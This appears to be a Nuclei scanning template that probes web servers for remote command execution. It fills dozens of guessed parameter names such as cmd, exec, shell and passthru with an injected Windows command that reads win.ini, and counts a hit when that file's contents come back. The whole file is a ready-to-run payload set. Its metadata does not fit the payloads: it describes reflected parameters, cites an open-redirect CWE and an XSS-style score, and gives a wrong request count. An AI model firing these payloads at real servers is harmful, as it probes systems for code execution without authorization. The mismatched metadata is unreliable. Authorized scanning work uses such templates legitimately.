id: 2rce6-13

info:
  name: 2rce
  author: xandsz
  severity: medium
  description: 'Verifica parâmetros ocultos que refletem dentro do HTML da página.'
  tags: fuzzer, generic
  classification:
    cwe-id: CWE-601
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
  metadata:
    max-request: 2

http:
  - method: GET
    path:
      - '{{BaseURL}}?cmd=%26type%20C%3A%5CWINDOWS%5Cwin.ini&command=%26type%20C%3A%5CWINDOWS%5Cwin.ini&exec=%26type%20C%3A%5CWINDOWS%5Cwin.ini&execute=%26type%20C%3A%5CWINDOWS%5Cwin.ini&payload=%26type%20C%3A%5CWINDOWS%5Cwin.ini&code=%26type%20C%3A%5CWINDOWS%5Cwin.ini&shell=%26type%20C%3A%5CWINDOWS%5Cwin.ini&script=%26type%20C%3A%5CWINDOWS%5Cwin.ini&system=%26type%20C%3A%5CWINDOWS%5Cwin.ini&run=%26type%20C%3A%5CWINDOWS%5Cwin.ini&eval=%26type%20C%3A%5CWINDOWS%5Cwin.ini&proc=%26type%20C%3A%5CWINDOWS%5Cwin.ini&eval_base64=%26type%20C%3A%5CWINDOWS%5Cwin.ini&include=%26type%20C%3A%5CWINDOWS%5Cwin.ini&require=%26type%20C%3A%5CWINDOWS%5Cwin.ini'
      - '{{BaseURL}}?load=%26type%20C%3A%5CWINDOWS%5Cwin.ini&open=%26type%20C%3A%5CWINDOWS%5Cwin.ini&read=%26type%20C%3A%5CWINDOWS%5Cwin.ini&write=%26type%20C%3A%5CWINDOWS%5Cwin.ini&fetch=%26type%20C%3A%5CWINDOWS%5Cwin.ini&wget=%26type%20C%3A%5CWINDOWS%5Cwin.ini&curl=%26type%20C%3A%5CWINDOWS%5Cwin.ini&php%3A%2F%2Finput%3D%26type%20C%3A%5CWINDOWS%5Cwin.ini&data%3A%2F%2F%3D%26type%20C%3A%5CWINDOWS%5Cwin.ini&phar%3A%2F%2F%3D%26type%20C%3A%5CWINDOWS%5Cwin.ini&expect%3A%2F%2F%3D%26type%20C%3A%5CWINDOWS%5Cwin.ini&zlib%3A%2F%2F%3D%26type%20C%3A%5CWINDOWS%5Cwin.ini&compress.zlib%3A%2F%2F%3D%26type%20C%3A%5CWINDOWS%5Cwin.ini&zip%3A%2F%2F%3D%26type%20C%3A%5CWINDOWS%5Cwin.ini&phar%3A%2F%2F%3D%26type%20C%3A%5CWINDOWS%5Cwin.ini'
      - '{{BaseURL}}?backtick_cmd=%26type%20C%3A%5CWINDOWS%5Cwin.ini&os_cmd=%26type%20C%3A%5CWINDOWS%5Cwin.ini&exec_cmd=%26type%20C%3A%5CWINDOWS%5Cwin.ini&proc_open=%26type%20C%3A%5CWINDOWS%5Cwin.ini&popen=%26type%20C%3A%5CWINDOWS%5Cwin.ini&passthru=%26type%20C%3A%5CWINDOWS%5Cwin.ini&system_exec=%26type%20C%3A%5CWINDOWS%5Cwin.ini&system_cmd=%26type%20C%3A%5CWINDOWS%5Cwin.ini&system_command=%26type%20C%3A%5CWINDOWS%5Cwin.ini&system_shell=%26type%20C%3A%5CWINDOWS%5Cwin.ini&shell_exec=%26type%20C%3A%5CWINDOWS%5Cwin.ini&assert=%26type%20C%3A%5CWINDOWS%5Cwin.ini&assertion=%26type%20C%3A%5CWINDOWS%5Cwin.ini&assert_code=%26type%20C%3A%5CWINDOWS%5Cwin.ini&assert_eval=%26type%20C%3A%5CWINDOWS%5Cwin.ini&assert_php=%26type%20C%3A%5CWINDOWS%5Cwin.ini'
      - '{{BaseURL}}?assert_template=%26type%20C%3A%5CWINDOWS%5Cwin.ini&eval_shell=%26type%20C%3A%5CWINDOWS%5Cwin.ini&exec_shell=%26type%20C%3A%5CWINDOWS%5Cwin.ini&shell_eval=%26type%20C%3A%5CWINDOWS%5Cwin.ini'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '[mci extensions]'
